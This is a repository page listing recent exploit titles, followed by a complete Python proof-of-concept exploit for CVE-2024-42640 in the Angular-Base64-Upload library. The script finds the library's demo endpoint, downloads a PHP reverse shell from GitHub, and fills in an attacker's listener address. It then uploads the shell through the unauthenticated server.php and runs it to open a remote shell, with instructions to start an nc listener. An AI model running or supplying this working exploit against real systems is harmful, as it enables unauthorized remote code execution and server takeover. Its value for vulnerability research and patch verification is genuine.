60175c9963
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
138 lines
No EOL
6.2 KiB
Python
Executable file
138 lines
No EOL
6.2 KiB
Python
Executable file
# Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)
|
|
# Date: 10 October 2024
|
|
# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
|
|
# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
|
|
# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
|
|
# Software Link: https://github.com/adonespitogo/angular-base64-upload
|
|
# Version: prior to v0.1.21
|
|
# Tested on: Arch Linux
|
|
# CVE : CVE-2024-42640
|
|
# Severity: Critical - 10.0 (CVSS 4.0)
|
|
# Github Link : https://github.com/rvizx/CVE-2024-42640
|
|
# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
|
|
|
|
# DISCLAIMER:
|
|
|
|
# This proof-of-concept (POC) exploit is provided strictly for educational and research purposes.
|
|
# It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems.
|
|
# The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities.
|
|
# Any actions taken with this code are undertaken at the sole discretion and risk of the user.
|
|
# The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems.
|
|
# Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited.
|
|
# By using this code, you agree to assume all responsibility and liability for your actions.
|
|
# Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code.
|
|
# It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software.
|
|
# Proceed with caution and use this code responsibly.
|
|
|
|
#!/bin/python3
|
|
|
|
import re
|
|
import subprocess
|
|
import requests
|
|
import sys
|
|
import os
|
|
import uuid
|
|
import base64
|
|
|
|
|
|
def banner():
|
|
print('''
|
|
|
|
\033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit
|
|
\033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9
|
|
https://github.com/rvizx/\033[0mCVE-2024-42640
|
|
|
|
''')
|
|
|
|
|
|
def enum(url):
|
|
print("\033[94m[inf]:\033[0m enumerating for dependency installtion directories... ")
|
|
target = f"{url}/bower_components/angular-base64-upload/demo/index.html"
|
|
r = requests.head(target)
|
|
if r.status_code == 200:
|
|
print("\033[94m[inf]:\033[0m target is using bower_components")
|
|
else:
|
|
print("\033[94m[inf]:\033[0m target is not using bower_components")
|
|
target = f"{url}/node_modules/angular-base64-upload/demo/index.html"
|
|
r = requests.head(target)
|
|
if r.status_code == 200:
|
|
print("\033[94m[inf]:\033[0m target is using node_modules")
|
|
else:
|
|
print("\033[94m[inf]:\033[0m target is not using node_modules")
|
|
print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html")
|
|
print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
|
|
print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
|
|
print("\033[91m[err]:\033[0m exiting..")
|
|
exit()
|
|
|
|
version = next((line for line in requests.get(target.replace("demo/index.html","CHANGELOG.md")).text.splitlines() if 'v0' in line), None)
|
|
print("\033[94m[inf]:\033[0m angular-base64-upload version: ",version)
|
|
exploit(target)
|
|
|
|
|
|
|
|
|
|
|
|
def exploit(target):
|
|
print(f"[dbg]: {target}")
|
|
target_server_url = target.replace("index.html","server.php")
|
|
print(f"[dbg]: {target_server_url}")
|
|
payload_url = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
|
|
print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
|
|
ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
|
|
port = input("\033[93m[ins]:\033[0m enter listenter port: ")
|
|
print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
|
|
input("\033[93m[ins]:\033[0m press enter to continue...")
|
|
print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
|
|
response = requests.get(payload_url)
|
|
if response.status_code == 200:
|
|
php_code = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
|
|
payload_name = str(uuid.uuid4())+".php" # using a uuid for payload name
|
|
with open(payload_name, "w") as file:
|
|
file.write(php_code)
|
|
else:
|
|
print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
|
|
print("\033[91m[err]:\033[0m exiting..")
|
|
exit()
|
|
|
|
with open(payload_name, 'rb') as file:
|
|
file_content = file.read()
|
|
base64_payload = base64.b64encode(file_content).decode('utf-8')
|
|
|
|
headers = {
|
|
'Content-Type': 'application/json',
|
|
}
|
|
|
|
json_data = {
|
|
'base64': base64_payload,
|
|
'filename': payload_name,
|
|
}
|
|
|
|
response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
|
|
print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
|
|
updemo_endpoint = f"uploads/{payload_name}"
|
|
print(f"[dbg]: {updemo_endpoint}")
|
|
payload_url = target_server_url.replace("server.php",updemo_endpoint)
|
|
print(f"[dbg]: {payload_url}")
|
|
if response.status_code == 200:
|
|
print(f"\033[94m[inf]:\033[0m reverse-shell is uploaded to {payload_url}")
|
|
print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
|
|
r = requests.get(payload_url)
|
|
|
|
if r.status_code == 200:
|
|
print("\033[94m[inf]:\033[0m process complete!")
|
|
else:
|
|
print("\033[91m[err]:\033[0m something went wrong!")
|
|
|
|
print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")
|
|
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
banner()
|
|
url = sys.argv[1]
|
|
print(f"\033[94m[inf]:\033[0m target: {url}")
|
|
enum(url)
|
|
except:
|
|
print("[usg]: ./exploit.py <target-url>")
|
|
exit() |